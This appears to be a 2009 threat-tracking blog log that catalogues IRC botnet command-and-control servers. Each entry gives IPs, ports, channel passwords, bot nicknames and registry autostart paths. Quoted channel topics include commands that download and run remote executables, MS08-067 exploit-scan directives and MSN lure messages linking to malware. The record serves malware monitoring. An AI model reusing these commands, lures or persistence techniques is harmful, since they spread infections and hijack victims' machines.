212.116.225.118 6667, 4244
Channel: #!N!#
.download http://photophoto.com.ar/photo.exe C:/aha.exe 1
.msn.msg Estat Photo so Tuos ? http://photophoto.com.ar/msn.exe?=
Autostartpath
LM\Software\Microsoft\Windows\CurrentVersion\Run\
Windows UDP Control Center = winudpmgr.exe
C:\WINDOWS\winudpmgr.exe
Saturday, September 12, 2009
nhg1.cjb.net ( msn )
64.127.41.211 ( Johnny_Demonik ) ( H4CK3D.US )
64.127.41.211 6667
USERHOST [00|USA|XP|SP3]-4698
MODE [00|USA|XP|SP3]-4698 -x+iB
JOIN #D3v|lz password: D3v|lz666
.download http://shells.h4ck3d.us/Viri/Johnny_Demonik.exe C:\Johnny_Demonik.exe 1
Autostartpath
%System%\regeditv8.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft = "RegEditv8.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
Microsoft = "RegEditv8.exe"
[HKEY_CURRENT_USER\Software\ASProtect]
Microsoft = "RegEditv8.exe"
Friday, September 11, 2009
new.burimche.net ( burimi ) ( NESbot )
*** IP of : 85.248.5.222 host new.burimche.net
85.248.5.222 1212
NICK [solo][USA|XP|16993]
USER NESv5 * 0 :[solo][USA|XP|16993]
Channel:
#buli#
#infochan Topic is '.msn.stop|.msn.msg foto http://www.hi5-ph0tos.com/viewimage.php?='
password:
letmein
Autostartpath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
winsvc32 = winsvc32.exe
218.29.54.25 ( ms08-067 )
218.29.54.25 7384
Nick [00_USA_XP_3338273]
Channel: #sbu
Topic :.asc -S|.http http://89.149.227.51/strang.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r
Autostartpath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
Microsoft Driver Setup = C:\WINDOWS\msvddr32.exe
b1n.th3kings.net
*** IP of : 203.154.27.138 host b1n.th3kings.net
203.154.27.138 27034
JOIN #!!ss!!# password: bbbbbbb
MODE [00|USA|412536] +ix
Autostartpath
LM\Software\Microsoft\Windows\CurrentVersion\Run
javaupdate = "C:\Windows\svchost.exe.exe"
Thursday, September 10, 2009
botnet.byinter.net ( msn and usb )
174.132.181.27 6667
Channel #botnet
Channel: #KCA with Password KCA
Channel Topic for Channel #KCA: ".msn"
Server stats
There are 89 users and 774 invisible on 4 servers
5 operator(s) online
21 unknown connection(s)
23 channels formed
I have 851 clients and 2 servers
-
Current Local Users: 851 Max: 1003
Current Global Users: 863 Max: 1814
Wednesday, September 9, 2009
82.114.87.46 ( msn )
82.114.87.46 1868
MODE [00|USA|920254] -ix
JOIN #!a!
Topic is '.msn.stop|.msn.msg ola! Cette photo est la vôtre? http://galery.ga.ohost.de/photoss.php?='
Autostart path
CU\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite
"C:\Windows\installed.exe"
LM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Shell "Explorer.exe"/"Explorer.exe, C:\Windows\installed.exe"
LM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userini
"C:\WINDOWS\system32\userinit.exe,"/"C:\WINDOWS\system32\userinit.exe, C:\Windows\installed.exe"
Tuesday, September 8, 2009
lovings.technigoyous.net ( MS08-067 )
lovings.technigoyous.net DNS_TYPE_A 125.83.89.212
125.83.89.212:1863
Nick: [N00_AUT_XP_4752491]H\xe8@
Username: SP3-086
Joined Channel: #bb with Password ^B^B^B^B
Channel Topic for Channel #bb: ".asc -S -s |.http http://218.10.17.212/hihi.exe |.asc exp_all 15 5 0 -a -r -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 10 5 0 -c -e |.asc exp_all 3 5 0 -b -r |.asc exp_all 3 5 0 -c"
218.10.17.212:8585 ( MS08-067 )
There are 5520 users and 143 invisible on 1 servers
1 operator(s) online
88 unknown connection(s)
6 channels formed
I have 5663 clients and 0 servers
-
Current Local Users: 5663 Max: 9882
Current Global Users: 5663 Max: 9882
#tony 41 [+mu] .r.getfile http://rapidshare.com/files/276894379/hihi.exe C:\difdhg.exe 1
#petro 7 [+mnMCu] .r.getfile http://rapidshare.com/files/276894379/hihi.exe C:\sidh.exe 1
#tanker 5468 [+mMu] .asc -S|.http http://218.10.17.212/cakar.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r
#new 71 [+mu]
#sucker 18 [+mu]
Thursday, September 3, 2009
174-143-210-150.static.cloud-ips.com ( ms08-067 ) ( J )
174.143.210.150:80
JOIN #xx10
MODE [00_USA_XP_7029018] -ix
IDENT SP3-191
USERNAME Peter
Topic is '.asc -S -s |.http http://94.76.194.116/xx10.exe |.asc exp_all 15 5 0 -a -r -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 10 5 0 -c -e |.asc exp_all 3 5 0 -b -r |.asc exp_all 3 5 0 -c |.down -S |.down http://94.76.194.116/brown.jpg c:\b2k8o4l4q3z1.exe c:\b2k8o4l4q3z1.exe -r -h'
Autostart path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Microsoft Driver Setup = C:\WINDOWS\system32\drivers\explorer.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Microsoft Driver Setup =C:\WINDOWS\system32\drivers\explorer.exe
Friday, August 28, 2009
tl6.welovewarez.com ( MS08-067 ) ( ALUCARD )
tl6.welovewarez.com DNS_TYPE_A 85.17.141.52
85.17.141.52:6700
Nick: [00|AUT|XP|411848]
Username: SP3-416
Joined Channel: ##!who!## with Password 101#
Channel Topic for Channel ##!who!##: ".sftp welovewarez.com 21 wat l0l1 SCUM.EXE|.asc -S -s|.asc svrsvc_ESP_SP2 100 5 0 148.245.x.x -r -s"
Autostart Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
Windows automatic updates = "C:\WINDOWS\system\iexplorer.exe"
Sunday, August 23, 2009
dddd.burimche.net (burimi)
dddd.burimche.net
87.105.154.165:4244
MODE [00|USA|650342] -ix
JOIN ##bb## bole
NICK [00|USA|650342]
USER XP-0248 * 0 :SSC-19116644F03
PASS letmein
NICK [00|USA|200623]
USER XP-6975 * 0 :COMPUTERNAME
Topic is '.msn.stop|.msn.msg new ha ha http://www.fakiratu.com/image.php?='
Set by C-RDP on Sun Aug 23 20:37:36
Auto Startup Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows UDP Control Center = "fxstaller.exe"
1033 TCP fxstaller.exe (%Windir%\fxstaller.exe)
1034 TCP fxstaller.exe (%Windir%\fxstaller.exe
69.64.50.107
69.64.50.107:6667
NICK COMPUTERNAME778
USER UserName ZM ZM COMPUTERNAME
JOIN #phcrulez
NICK COMPUTERNAME859
Autostart Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
WinLogon = "%Windir%\svhosr.exe"
1036 TCP svhosr.exe (%Windir%\svhosr.exe
Saturday, August 22, 2009
65.23.159.69 (x)
65.23.159.69:38722
User Name: XP-8703
Real Name: MICHAEL
Password: test
Nick Name: [USA|00|P|39732]
Non RFC Conform: 1
Channel
Name: #test
Password: test
Topic Deleted: :.msn.sendzip OMG is this you? |.aim.msg EW! look at this picture of you I found http://allyepic.com/Picture004.jpg |.triton.msg LOL http://allyepic.com/Picture004.jpg
Autostart path
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Firewall
Key:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Authorized
Applications\List
Value: C:\10239953.exe
Data: C:\10239953.exe:*:Enabled:svchosts
Friday, August 21, 2009
irc.tiklabosal.net (aBoLt)
*** IP of : 95.168.175.87 host irc.tiklabosal.net
95.168.175.87:6667
Channels
USERHOST USA|9478145
JOIN #Kr@L PASS: !B
JOIN #M3ist3R
MODE USA|9478145 -x+i
Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
.download http://www.tiklabosal.net/kral.exe c:\kral.exe 1 | aBoLt Siker xD
Autostart Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Internet Security Service = "expllorer.exe"
C:\WINDOWS\system32\expllorer.exe
sip4.voipkosovasite.com (BURIMI GAY NET IS BACK)
sip4.voipkosovasite.com
82.114.87.46:1868
MODE [00|USA|409999] -ix
JOIN #!a!
MODE [00|USA|409999] -ix
JOIN #!a!
Topic
is
'.msn.stop|.msn.msg all models photo news? :D
http://pisi.freewebhostx.com/photos.php?='
-irc.foonet.com- *** Notice -- l (auth@18076492.BE3D884F.78F63BB0.IP) [bobsmith] is now a network administrator (N)
Autostart path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Framework module library = "C:\WINDOWS\system32\infocard.exe"
Wednesday, August 19, 2009
net.anddos.co.uk (anddos)
net.anddos.co.uk DNS_TYPE_A 94.75.216.31
94.75.216.31:6667
MODE [00|USA|XP|SP3]-3806 -i
JOIN #120 bforce
Nick: [00|AUT|XP|SP3]-2415
Username: xyrbyc
Joined Channel: #120 with Password bforce
Channel Topic for Channel #120: ".find vnc-5900 60 3 0 189.x.x.x"
Private Message to Channel #120: "vnc-5900 for 0 minutes 5 delay 60 threads"
.dl http://94.75.216.31:85/~anddos/120c c:\120c.exe 1
Auto Startup
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Intranet = "winvs.exe"
Thursday, August 13, 2009
bot.sohbetodasi.info (Cod)
*** IP of : 84.201.14.35 host bot.sohbetodasi.info
84.201.14.35:6667
NICK USA|4833514
USER vkqsmeu 0 0 :USA|4833514
USERHOST USA|4833514
MODE USA|4833514 -x+i
JOIN ##scan##
NOTICE USA|4833514 :.VERSION mIRC v6.20 Khaled Mardam-Bey.
NICK USA|4748511
USER wnscqtc 0 0 :USA|4748511
* Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
Set by Cod on Fri Aug 14 04:06:33
.h download http://www.azginkizlar.net/syn.exe c:\syn.exe 1
Ports C:\WINDOWS\system32\msq23.exe
113 TCP msq23.exe (%System%\msq23.exe)
1053 TCP msq23.exe (%System%\msq23.exe)
1054 TCP msq23.exe (%System%\msq23.exe)
1055 TCP msq23.exe (%System%\msq23.exe)
Wednesday, August 12, 2009
irc.chatcafe.net
219.90.118.136:6667
User Name: kkcwihso
Host Name: "fo0.net"
Server Name:
Real Name: kkcwihso
Nick Name: raGe|AVMKKecdLc
Channel
# Name: #skynet
# Topic Deleted: :.xpl 93 3 190.x.x.x 2 0
94.75.216.31 (Anddos) botnet
94.75.216.31:6667
Nick: [nLh-VNC]ewuowy
Username: qtykph
Joined Channel: #dbot with Password pass
Channel Topic for Channel #dbot: ".h download http://www.sevgideyim.com/resimlerim.exe c:\sdffd.exe 1 "
Private Message to Channel #dbot: "RAGE: file running: 128 KB."
Private Message to Channel #dbot: "Samuray ^C13Anan\xfd sikkkkeeeeRimmmmmm G\xf6t\xfcnden"
channel: #ohai
Password: 0day
Topic Deleted: :.dl http://94.75.216.31:85/~anddos/rap/lsass3.exe c:\lsass3.exe 1
Channel list
#asn2 40
#asn3 1
#dbot 43 fuck off
#asn3b 2 .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#dci-test2 1
#asnre 1 .download .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#ohai2 21 .dl http://94.75.216.31:85/~anddos/dbot.exe c:\dbot.exe 1
#narod 2 .ver
#test1 30
#imbot4 1
#netapi 5
#dci 14
#asn 1 .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#vnc 1
#dci-test 5
#Samuray 1
cod.sohbetodasi.info
84.201.14.35:6667
Nick: [N]ktmfudxx
Username: TMR
Joined Channel: ##msn##
Channel Topic for Channel ##msn##: "p umar\xfdm be\xf0enirsin.. al bakal\xfdm"
Saturday, July 25, 2009
74.40.134.42 (ms08-067) exploit botnet (BLAZEBOT)
74.40.134.42:9595
Channel: ##esp, ##rus
NICK: {00-RUS-XP-SKLA-1644}
IDENT: MEAT
Wednesday, July 22, 2009
high.jweles.cn (Hidden)
*** IP of : 85.131.154.57 host high.jweles.cn
85.131.154.57:5555
Channel: #!high! h1ghsh1t
@hidz .msn.msg questa è la tua foto?? :P http://myspace-image.info/viewimage.php?=
NICK [00|USA|171262]
USER 2K-8552 * 0 :DDD-4C95834455D
MODE: [00|USA|171262] -ix
Autostart Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Update Service = "msupdate32.exe"
Extract Path
"C:\DOCUME~1\User\LOCALS~1\Temp\IXP000.TMP\reptile.exe"
"C:\WINDOWS\msupdate32.exe"
Monday, July 20, 2009
mail.bestservicestores.com
*** IP of : 76.12.178.4 host mail.bestservicestores.com
76.12.178.4:8890
Nick: b0FAkmaUntzFn1EVh65f45Y1m
Username: XP-SP3
Server Pass: fak
Joined Channel: #zUPLEX with Password fuck
Autostart
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions Melt
C:\Zuplex_025725.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal Windows Service Control C:\Documents and Settings\Administrator\Application Data\zupazxx.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network Windows Service Control C:\Documents and Settings\Administrator\Application Data\zupazxx.exe
Thursday, July 16, 2009
labtec.stupidnsm.cn (Hidden)
*** IP of : 85.131.154.57 host labtec.stupidnsm.cn
85.131.154.57:5555
NICK [00|USA|480852]
USER XP-8638 * 0 :DDD-4C95834455D
MODE [00|USA|480852] -ix
JOIN #!lab! labr0x
The new window was created, as shown below:
Autostart
LM\Software\Microsoft\Windows\CurrentVersion\Run\Windows Dynamic Library Cache "dllcaches.exe"
Wednesday, July 15, 2009
cr4ckr0x.net
*** IP of : 61.136.69.197 host cr4ckr0x.net
61.136.69.197:81
[ Changes to registry ]
* Creates key "HKLM\Software\\Microsoft\\Windows".
* Sets value "Windows Updates"="C:\PROGRA~1\COMMON~1\System\winlogo.exe" in key "HKLM\Software\\Microsoft\\Windows".
* Creates key "HKCU\Software\\Microsoft\\Windows".
* Sets value "Windows Updates"="C:\PROGRA~1\COMMON~1\System\winlogo.exe" in key "HKCU\Software\\Microsoft\\Windows".
Connects to IRC Server.
IRC: Uses nickname mlflODMDdlflhDM.
IRC: Uses username ckmpwuyac.
IRC: Joins channel #scanvnc with password rage.
Tuesday, July 14, 2009
axesor.no-ip.org
*** IP of : 208.77.191.41 host axesor.no-ip.org
208.77.191.41:6667
Nick: pc1426611183
Username: AUT5
Joined Channel: #dbs with Password pwneds
Channel Topic for Channel #dbs: "How knows"
To mark the presence in the system, the following Mutex object was created:
12cFx2FF
The following port was open in the system:
Port Protocol Process
1033 TCP iexplorer.exe (%Windir%\iexplorer.exe)
Monday, July 13, 2009
oao.th3kings.net
*** IP of : 203.154.27.139 host oao.th3kings.net
203.154.27.139:3333
Channel:#!zx!#
Password:zidanag
NICK [00|USA|947039]
USER XP-3986 * 0 :COMPUTERNAME
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
windows Live Messenger = "madbbcre.exe"
so that madbbcre.exe runs every time Windows starts
Malware Url
* CK changes topic to '.msn.msg Estas photo so tuyo? http://picture-sex1.com/myfotohi5.exe?='
Thursday, July 9, 2009
kao.th3kings.net
*** IP of : 203.158.16.157 host kao.th3kings.net
203.158.16.157:3333
Channel:#!zx!#
Password:zidanag
NICK [00|USA|654386]
USER XP-6752 * 0 :COMPUTERNAME
Registry Modifications
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
windows Live Messenger = "iexplore.exe"
so that iexplore.exe runs every time Windows starts
INSIDE CHANNEL
Friday, July 3, 2009
ms.update-host.com (Boom)
ms.update-host.com DNS_TYPE_A 66.225.230.213
66.225.230.213:4244
Nick: [00|USA|749660]
Username: XP-9148
Joined Channel: #!msn! with Password ms
Channel Topic for Channel #!msn!: "D http://msngallery.msnmy-pic.com/image.php?="
Private Message to Channel #!msn!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn!: "D http://msngallery.msnmy-pic.com/image.php?="
Private Message to Channel #!msn!: "msn// Thread Disabled."
Private Message to Channel #!msn!: ".login poppen -s"
abc.technigoyous.net (hidden)
*** IP of : 218.61.22.10 host abc.technigoyous.net
218.61.22.10:8585
Nick: [00|USA|203945]
Username: XP-3185
Joined Channel: #client1
Channel Topic for Channel #client1: ".r.getfile http://hi5-gallerys.com/loader.exe C:\sdfvinfo.exe 1"
Private Message to Channel #client1: "download// File download: 21.6KB to: C:\sdfvinfo.exe @ 21.6KB/sec."
Private Message to Channel #client1: "download// Created process: "C:\sdfvinfo.exe", PID: <208>"
Wednesday, July 1, 2009
italian.swiifatecihno.com
*** IP of : 218.61.22.10 host italian.swiifatecihno.com
ok changes topic to '.p.karikar http://hi5-gallerys.com/siwa.exe C:\sihd.exe 1 -s'
218.61.22.10:7763
Nick: fUuFaTLM
Username: pjhakt
Joined Channel: #siwa
Thursday, June 25, 2009
brawl.izthewiz.net (Blazebot) code by crim
*** IP of : 64.202.107.25 dns brawl.izthewiz.net
64.202.107.25:15433
Url exe: http://www.facebook-photo.net/images/pic9523846/
http://softwareshouse.com/clown/load.exe (bot)
C&C Server
USER R9aOi0GUERM1 qqljkaxf qqljkaxf qqljkaxf qqljkaxf
NICK: B13|NEW|USA|2K|VMDQVHTCZPK60U4
Channel: ##XTC##
JOIN: WwUd1X89I0 ##XTC## ........................
Topic:##XTC##:+BLZbopuX!bTgF6.hUEd71rSW9r06R5fL0EgKAq1IEXE5.Zp.1A05DyN7.Zsbd.!
auto startup path install as services
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\blazedworm]
Type = 0x00000001
Start = 0x00000003
ErrorControl = 0x00000000
ImagePath = "%System%\drivers\blazedworm.sys"
DisplayName = "blazedworm Driver"
Drop executable
C:\Documents and Settings\User\Application Data\WinNT\winlogon.exe
C:\Documents and Settings\User\Desktop\blazedworm.sys
C:\RECYCLER\blazewrm.vmx
more detail
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FBLAZEBOT%2EA&VSect=T
Monday, June 22, 2009
ad.chfo991.com
ad.chfo991.com DNS_TYPE_A 174.133.29.34
174.133.29.34:8585
Nick: [00|USA|030091]
Username: XP-0220
Server Pass: letmein
Joined Channel: #maya with Password open
Channel Topic for Channel #maya: "P http://pic-facebook.com/id.php?="
Private Message to Channel #maya: "msn// Thread Activated: Sending Message."
Sunday, June 21, 2009
x.chfo991.com (Agobot)
x.chfo991.com
174.133.29.34:1934
PASS wimax
NICK [00-USA-XP-2103030]
USER SP2-rel * 0 :COMPUTERNAME
Channel: #x
Topic: '-s.stop|-http http://img-facebook.com/ub.exe|-s.start 75 3 2'
* Set by ok on Sun Jun 21 18:01:43
Install as service
DisplayName = "MSC VSCS Service"
mscvscs.exe (%Windir%\system\mscvscs.exe)
box22.fel0ny.com (DCI BOT)
*** IP of : 67.212.185.170 host box22.fel0ny.com
67.212.185.170:4244
Channel: #chat1 chat01
NICK: blovhb
USER: bkqexh "" "lqb" :bkqexh
Autostart path
install component
{36f8ec70-c29a-11d1-b5c7-0000f8051515}
STubPath C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\windowsupdate.com
Saturday, June 20, 2009
nono.burimche.net
nono.burimche.net DNS_TYPE_A 75.102.25.9
75.102.25.9:7777
Nick: VirUs-crhwgypr
Username: VirUs
Server Pass: Virus
Joined Channel: #!lol!# with Password bubulim
Channel Topic for Channel #!lol!#: "^C0,12 No Bots."
Thursday, June 18, 2009
msn.update-host.com
msn.update-host.com dns 78.129.158.87: 1863
User Name: XP-2460
Real Name: MICHAEL-F156CF7
Password: owned
Nick Name: [N00|USA|236919]
Channel
Name: #!msn1!
Password: msnone
Topic Deleted: :!msn.stop|!msn.msg hey, is this you ?! :) http://yourflirtspace.dyns.net/photo.php?=
Wednesday, June 17, 2009
dddd.burimche.net
dddd.burimche.net DNS_TYPE_A 218.61.22.10
218.61.22.10:4244
Nick: [00|USA|457570]
Username: XP-5088
Server Pass: letmein
Joined Channel: ##bb## with Password bole
Channel Topic for Channel ##bb##: "P ? http://facebook-imageview.com/photos/profile.php?="
Private Message to Channel ##bb##: "msn// Thread Activated: Sending Message."
Private Message to Channel ##bb##: "msn// Thread Disabled."
cache.stupidnsm.cn
cache.stupidnsm.cn DNS_TYPE_A 72.44.39.110
72.44.39.110:4244
Nick: [00|USA|832824]
Username: XP-7068
Joined Channel: #!dll! with Password dc
Channel Topic for Channel #!dll!: "$ http://myspace-image.com/viewimage.php?="
Private Message to Channel #!dll!: "D fun. http://myspace-image.com/viewimage.php?="
Private Message to Channel #!dll!: ".login hidden"
Private Message to Channel #!dll!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!dll!: ".login hidden -s"
Private Message to Channel #!dll!: ".r.getfile http://nighthosting.info/rape.exe c:\rape.exe 1"
Private Message to Channel #!dll!: ".r.getfile http://nighthosting.info/rape.exe c:\rapxe.exe 1 "
Private Message to Channel #!dll!: "P http://myspace-image.com/viewimage.php?="
Private Message to Channel #!dll!: "download// transfer thread already running: <1>."
Private Message to Channel #!dll!: "main// Welcome."
Private Message to Channel #!dll!: ".r.getfile http://nighthosting.info/xx.exe c:\xpxe.exe
Tuesday, June 16, 2009
msn.update-host.com
msn.update-host.com
194.25.24.122:1863
Nick: [N00USA378011]
Username: XP-4485
Server Pass: owned
Joined Channel: #!msn1! with Password msnone
Channel Topic for Channel #!msn1!: "D http://www.msnspaces.dyns.net/image.php?="
Private Message to Channel #!msn1!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn1!: "msn// Thread Disabled."
Sunday, June 14, 2009
fix.mainmsn.net
fix.mainmsn.net DNS_TYPE_A 194.25.24.122
194.25.24.122:1863
Nick: [N00|USA|603346]
Username: XP-5568
Server Pass: owned
Joined Channel: #!msn1! with Password msnone
Channel Topic for Channel #!msn1!: "D http://www.face-book.dyns.net/image.php?="
Private Message to Channel #!msn1!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn1!: "msn// Thread Disabled."
Saturday, June 13, 2009
nono.burimche.net
nono.burimche.net DNS_TYPE_A 74.3.192.201
74.3.192.201:7777
Nick: VirUs-zmjyfmwb
Username: VirUs
Server Pass: Virus
Joined Channel: #!lol!# with Password bubulim
lol.burimche.net
lol.burimche.net DNS_TYPE_A 89.255.10.90
89.255.10.90:1988
Nick: [00|USA|349782]
Username: XP-7873
Joined Channel: #!lol!# with Password bubulim
Channel Topic for Channel #!lol!#: ".msn.msg new welcome all http://www-facebook.org/images.php?="
Private Message to Channel #!lol!#: "msn// Thread Activated: Sending Message."
Friday, June 12, 2009
kao.th3kings.net
kao.th3kings.net DNS_TYPE_A 203.154.27.138
203.154.27.138:3333
Nick: [00|USA|752002]
Username: XP-2292
Joined Channel: #!zx!# with Password zidanag
Channel Topic for Channel #!zx!#: ".msn.msg Estas Foto so Tuyo?? http://best-fotos.com/badgirl.exe?="
Private Message to Channel #!zx!#: "msn// Thread Activated: Sending Message."
Subscribe to:
Posts (Atom)
